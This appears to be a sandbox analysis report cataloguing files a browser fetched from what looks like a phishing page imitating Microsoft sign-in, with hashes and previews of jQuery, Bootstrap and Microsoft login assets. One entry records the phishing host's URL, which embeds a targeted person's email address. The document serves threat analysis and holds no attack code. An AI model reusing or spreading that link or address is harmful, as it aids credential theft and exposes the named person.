                                                                                                                                                    URL:https://code.jquery.com/jquery-3.1.1.min.js
                                                                                                                                                    Preview:/*! jQuery v3.1.1 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):513
                                                                                                                                                    Entropy (8bit):4.720499940334011
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:t4BdU/uRqv6DLfBHKFWJCDLfBSU1pRXIFl+MJ4bADc:t4TU/uRff0EcfIU1XXU+t2c
                                                                                                                                                    MD5:A9CC2824EF3517B6C4160DCF8FF7D410
                                                                                                                                                    SHA1:8DB9AEBAD84CA6E4225BFDD2458FF3821CC4F064
                                                                                                                                                    SHA-256:34F9DB946E89F031A80DFCA7B16B2B686469C9886441261AE70A44DA1DFA2D58
                                                                                                                                                    SHA-512:AA3DDAB0A1CFF9533F9A668ABA4FB5E3D75ED9F8AFF8A1CAA4C29F9126D85FF4529E82712C0119D2E81035D1CE1CC491FF9473384D211317D4D00E0E234AD97F
                                                                                                                                                    Malicious:false
                                                                                                                                                    URL:https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg
                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><title>assets</title><path d="M18,11.578v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944.594.594L7.617,11.578Z" fill="#404040"/><path d="M10.944,7.056l.594.594L7.617,11.578H18v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944m0-.141-.071.07L5.929,11.929,5.858,12l.071.071,4.944,4.944.071.07.071-.07.594-.595.071-.07-.071-.071L7.858,12.522H18.1V11.478H7.858l3.751-3.757.071-.071-.071-.07-.594-.595-.071-.07Z" fill="#404040"/></svg>
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (48664)
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):48944
                                                                                                                                                    Entropy (8bit):5.272507874206726
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:9VG5R15WbHVKZrycEHSYro34CrSLB6WU/6DqBf4l1B:9VIRuo53XiwWTvl1B
                                                                                                                                                    MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                                                                                                                                    SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                                                                                                                                    SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                                                                                                                                    SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):1864
                                                                                                                                                    Entropy (8bit):5.222032823730197
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                                                                                                                    MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                                                                                                    SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                                                                                                    SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                                                                                                    SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                                                                                                    Malicious:false
                                                                                                                                                    URL:https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (32012)
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):69597
                                                                                                                                                    Entropy (8bit):5.369216080582935
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:qNhEyjjTikEJO4edXXe9J578go6MWX2xkjVe4c4j2ll2Ac7pK3F71QDU8CuT:Exc2yjq4j2uYnQDU8CuT
                                                                                                                                                    MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                                                                                                                                    SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                                                                                                                                    SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                                                                                                                                    SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (32065)
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):85578
                                                                                                                                                    Entropy (8bit):5.366055229017455
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                                                                                                                                                    MD5:2F6B11A7E914718E0290410E85366FE9
                                                                                                                                                    SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                                                                                                                    SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                                                                                                                    SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                                                                                                                    Malicious:false
                                                                                                                                                    URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                                                                                                                                                    Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):16752
                                                                                                                                                    Entropy (8bit):7.978169920886572
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:pVKDsqDG7pgIEyaBp5CPxe/ikiEz1r5WyWfKJ28ghpaNPtx5qlHi:3KD8pgIE5Bp5CJeqkjnWyWCJ28ghpaNx
                                                                                                                                                    MD5:EB1D2AB7B6E63E28FAB6120B8B9E0795
                                                                                                                                                    SHA1:DCAA1FC629DD44950B586A37DACAD5CF4F623685
                                                                                                                                                    SHA-256:AD05B349F5FB7D53EBE13E72F9B7C467396A739D9FAAD6398E82C179D3C62A5E
                                                                                                                                                    SHA-512:B1528D6324968FEEE8BCC1BB8A238C000B1DC2EE8C3DC566C058B384039D864C6836C312B7FC179819338923CA2D85A19FEF8AC3FEE4DD7AA2401BB807AC8027
                                                                                                                                                    Malicious:false
                                                                                                                                                    URL:https://vnondb0nbw.satelitnetkomputer.my.id:8443/impact?9Il8ioxWZyn0?key=matthieu.biens@rockwool.com
                                                                                                                                                    Preview:c....Q...D..!...p.....i.....}R.."..n...m...$..$....y..........'K....{) $K;.R.$..$-..|U......3..^...\S.?|......R. r.....S.Jw...._.@.nE..G..$..@....:m5...1...1S.!..B.....h...Jr..L...n.... ,..p._..g...'..m..........s....5d..|......%...H...i.z...g.w..yS...g........~..C .L............2...{..n....?....?....i......>........[>..T]..._...4.W_..H..../.~3...?~.0....._..#'....}...../.4.|.~}Z..U.+..#..C...0../....f..g....g.0.N.j.{.Dr.(./..J../F.............>..7....K...J..Z.......g].s+..?3.....~.~}>..S...\.~..n.7&......V.f....xs}......7....j\........N.6.'......nO0.q...........Ct.Q.....].......x.~...o9?...._>....O....l...,.6$...`.;.Hz...p.#.$..w.'.A.m.....5.....*..i75...?..v......"......*.ha...h..fe.!....fZ.F].....L..6..Zi..b./..8.)`i..}.hL...j.l.,..,..6..9n.....i....a.j.M..o......@s..o...I]...(^]4.OfE.X%@Pu.%..F1q.n...."?......+..N...U.......5.6.oK..kl...2..Rc..f..&m.V.3./R.JT^..t.f..q0...p.R.........yF....A........<z.0[..\b3h)L{&.........hu[h...}n
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):513
                                                                                                                                                    Entropy (8bit):4.720499940334011
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:t4BdU/uRqv6DLfBHKFWJCDLfBSU1pRXIFl+MJ4bADc:t4TU/uRff0EcfIU1XXU+t2c
                                                                                                                                                    MD5:A9CC2824EF3517B6C4160DCF8FF7D410
                                                                                                                                                    SHA1:8DB9AEBAD84CA6E4225BFDD2458FF3821CC4F064
                                                                                                                                                    SHA-256:34F9DB946E89F031A80DFCA7B16B2B686469C9886441261AE70A44DA1DFA2D58
                                                                                                                                                    SHA-512:AA3DDAB0A1CFF9533F9A668ABA4FB5E3D75ED9F8AFF8A1CAA4C29F9126D85FF4529E82712C0119D2E81035D1CE1CC491FF9473384D211317D4D00E0E234AD97F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><title>assets</title><path d="M18,11.578v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944.594.594L7.617,11.578Z" fill="#404040"/><path d="M10.944,7.056l.594.594L7.617,11.578H18v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944m0-.141-.071.07L5.929,11.929,5.858,12l.071.071,4.944,4.944.071.07.071-.07.594-.595.071-.07-.071-.071L7.858,12.522H18.1V11.478H7.858l3.751-3.757.071-.071-.071-.07-.594-.595-.071-.07Z" fill="#404040"/></svg>
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (61177)
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):110118
                                                                                                                                                    Entropy (8bit):5.288593644108406
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:QpHDgBvguhw+EViazA/PWrF7qvEAFiQcpmUyDzz6yVUns:xktHyVUs
                                                                                                                                                    MD5:29F1D1172158F929B64CC926E4521C0B
                                                                                                                                                    SHA1:AF19579C25EBBFD3BBC82A5AB77479647FE02AB8
                                                                                                                                                    SHA-256:8B6A3B17737161E5FE8C29E401372A94B8E650226CF0CD17B4C3C4DE5B380B11
                                                                                                                                                    SHA-512:DA984750F76BF1795737A507163E4180767D8688E4A55ED343363A831DB0E601702DE4F3AEC4D21F88D014B355CD296B422CABCBC7C8A236AAD65F19FF43383D
                                                                                                                                                    Malicious:false
                                                                                                                                                    URL:https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_kfhrfyfy-sm2tmkm5ficcw2.css
                                                                                                                                                    Preview:/*! Copyright (C) Microsoft Corporation. All rights reserved. *//*!.------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------..This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise...//-----------------------------------------------------------------------------.twbs-bootstrap-sass (3.3.0).//-----------------------------------------------------------------------------..The MIT License (MIT)..Copyright (c) 2013 Twitter, Inc..Permission is hereby granted, free of charge, to any person
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):1435
                                                                                                                                                    Entropy (8bit):7.8613342322590265
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                                                                                    MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                                                                                    SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                                                                                    SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                                                                                    SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                                                                                    Malicious:false
                                                                                                                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg
                                                                                                                                                    Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (32065)
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):85578
                                                                                                                                                    Entropy (8bit):5.366055229017455
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                                                                                                                                                    MD5:2F6B11A7E914718E0290410E85366FE9
                                                                                                                                                    SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                                                                                                                    SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                                                                                                                    SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3651
                                                                                                                                                    Entropy (8bit):4.094801914706141
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
                                                                                                                                                    MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                                                                                                                    SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                                                                                                                    SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                                                                                                                    SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (32012)
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):69597
                                                                                                                                                    Entropy (8bit):5.369216080582935
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:qNhEyjjTikEJO4edXXe9J578go6MWX2xkjVe4c4j2ll2Ac7pK3F71QDU8CuT:Exc2yjq4j2uYnQDU8CuT
                                                                                                                                                    MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                                                                                                                                    SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                                                                                                                                    SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                                                                                                                                    SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                                                                                                                                    Malicious:false
                                                                                                                                                    URL:https://code.jquery.com/jquery-3.2.1.slim.min.js
                                                                                                                                                    Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (48664)
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):48944
                                                                                                                                                    Entropy (8bit):5.272507874206726
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:9VG5R15WbHVKZrycEHSYro34CrSLB6WU/6DqBf4l1B:9VIRuo53XiwWTvl1B
                                                                                                                                                    MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                                                                                                                                    SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                                                                                                                                    SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                                                                                                                                    SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                                                                                                                                    Malicious:false
                                                                                                                                                    URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
                                                                                                                                                    Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):229376
                                                                                                                                                    Entropy (8bit):5.069292087213279
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:+tah6/K+TCtlMhTze/RZcYmDizK8dB7alFys/WL/umH4N0IPfKuC:9pZcYmDcHwFygmY1Pfo
                                                                                                                                                    MD5:3AC08BDD4E6977ADFB42A5A7213276AD
                                                                                                                                                    SHA1:13806A18B9E0CD6186F075612634D2AA15941F52
                                                                                                                                                    SHA-256:D985C6ADE3D63EDE5E8A70C484D89BB40BC202E4A745AAD7F6E539294EE25E89
                                                                                                                                                    SHA-512:49F128F962E8328909FEC704906F6ECA0C63BA375B814E8208A5E821DD1E74170FA0066965A0751C0CE7E7CCA795863C308D9EB5763EFF972954DFC14A4084F3
                                                                                                                                                    Malicious:false
